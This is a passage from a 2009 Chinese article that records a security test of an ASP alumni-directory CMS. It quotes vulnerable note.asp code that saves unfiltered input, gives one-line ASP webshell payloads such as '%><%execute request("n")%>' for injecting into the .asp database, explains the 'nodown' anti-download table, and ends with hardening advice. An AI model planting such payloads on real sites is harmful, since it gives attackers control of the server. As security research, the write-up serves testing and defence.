不懂ASP也照样挖漏洞 记一次CMS型校友录的安全检测
2009-01-05 13:50:06 来源:WEB开发网图22
说明:
此方法会造成网站无法正常浏览,在上传大马后,应及时恢复原配置文件siteinfo.asp。
五、直接拿webshell
本来这是在最前面测试的,但由于各种原因,我把它放最后。数据库是以asp文件存在,如果使用者没更改默认数据 库文件,那么就在可以输入的地方往数据库内插入一句话木马,直接得到webshell。于是查找所有文件中包含 “request.form”的文件,最后在note.asp文件中发现,程序未对客户输入的内容做任何过滤,可以把一句话木马直接 插入数据库内。
if request("type2")="add" then
rs.open "select * from note1 where userid="&session("xyluserid")&"",conn,1,3
If Rs.eof Then
rs.addnew
response.write "添加成功"
rs("userid")=session("xyluserid")
end if
rs("content")=request.form("content")
rs.update
rs.close
response.write "修改成功"
end if
于是尝试在往数据库 中插入:“%><%execute request("n")%><%”“%><%execute request("n")%>”等多种一句话的 Unicode字符,再访问数据库文件,都显示,无法闭合,如图23所示。
CMS型校友录的安全检测" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
图23
原因是数据库中存在nodown表,做了防下载处理,不过应该可以突破,但本人能力有限,未能进一步突破。
安全小知识:如何建立nodown防下载表?
首先,用notepad新建一个内容为“<%”的文本文件,随便起个名字 存档。
接着,用Access打开您的数据库文件,在最后新建一个表,随便起个名字,在表中添加一个OLE对象的字段, 然后添加一个记录,插入之前建立的文本文件,如果操作正确的话,应该可以看到一个新的名为“数据包”的记录。
六、总结
由于本人不懂ASP,能力有限,所以此次检测并没有太深入,还有一些XSS跨站攻击和上传等也未进行测试,总体来说 ,这套CMS的安全性还是可以的,如果管理员密码设置复杂一些,登录不了后台,那也无法拿到webshell。个人认为在选 择CMS时,选择一些成熟的CMS产品安全性会高些,同时也应该把数据库文件和配置文件的名称改复杂一些。
- ››ASP.NET及JS中的cookie基本用法
- ››ASP.NET获取MS SQL Server安装实例
- ››asp.net实现调用百度pai 在线翻译英文转中文
- ››ASP.NET页面选项进行提示判断
- ››Asp.net定时执行程序
- ››ASP.NET中利用DataList实现图片无缝滚动
- ››ASP.NET验证控件RequiredFieldValidator
- ››ASP.NET中使用System.Net.Mail发邮件
- ››ASP.NET中获取用户控件中控件的ID
- ››ASP.NET中FileBytes写成文件并存档
- ››asp获取毫秒数
- ››asp.net报“INSERT INTO 语句的语法错误解决
更多精彩
赞助商链接